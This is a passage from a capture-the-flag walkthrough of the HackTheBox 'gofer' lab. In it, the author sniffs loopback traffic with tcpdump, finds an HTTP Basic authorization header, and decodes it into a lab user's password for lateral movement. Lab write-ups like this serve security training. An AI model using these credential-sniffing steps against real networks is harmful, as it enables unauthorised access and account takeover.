tcpdump
PEAS has discovered that the current user, jhudson, is able to sniff packets using tcpdump
This means that I am able to audit the entire network traffic
jhudson@gofer:/opt/notes$ tcpdump -n -i lo -v
tcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 262144 bytes
20:05:01.471277 IP (tos 0x0, ttl 64, id 57128, offset 0, flags [DF], proto TCP (6), length 60)
127.0.0.1.35148 > 127.0.0.1.80: Flags [S], cksum 0xfe30 (incorrect -> 0xc933), seq 3389266128, win 65495, options [mss 65495,sackOK,TS val 2220922364 ecr 0,nop,wscale 7], length 0
20:05:01.471297 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 60)
127.0.0.1.80 > 127.0.0.1.35148: Flags [S.], cksum 0xfe30 (incorrect -> 0x68da), seq 3651234900, ack 3389266129, win 65483, options [mss 65495,sackOK,TS val 2220922365 ecr 2220922364,nop,wscale 7], length 0
20:05:01.471309 IP (tos 0x0, ttl 64, id 57129, offset 0, flags [DF], proto TCP (6), length 52)
127.0.0.1.35148 > 127.0.0.1.80: Flags [.], cksum 0xfe28 (incorrect -> 0x8f95), ack 1, win 512, options [nop,nop,TS val 2220922365 ecr 2220922365], length 0
20:05:01.471375 IP (tos 0x0, ttl 64, id 57130, offset 0, flags [DF], proto TCP (6), length 215)
127.0.0.1.35148 > 127.0.0.1.80: Flags [P.], cksum 0xfecb (incorrect -> 0xa0ae), seq 1:164, ack 1, win 512, options [nop,nop,TS val 2220922365 ecr 2220922365], length 163: HTTP, length: 163
get /?url=http://gofer.htb HTTP/1.1
host: proxy.gofer.htb
authorization: Basic dGJ1Y2tsZXk6b29QNGRpZXRpZTNvX2hxdWFldGk=
user-agent: curl/7.74.0
accept: */*The command above captures all the network traffic over the loopback address
One of the captured packets is a GET request to the proxy server at proxy.gofer.htb with the base64-encoded credential
Decoding
┌──(kali㉿kali)-[~/archive/htb/labs/gofer]
└─$ echo 'dGJ1Y2tsZXk6b29QNGRpZXRpZTNvX2hxdWFldGk=' | base64 -d
tbuckley:ooP4dietie3o_hquaetiDecoding the base64 string back to ASCII reveals the credential for the tbuckley user
tbuckley:ooP4dietie3o_hquaeti
Moving on to the Lateral Movement phase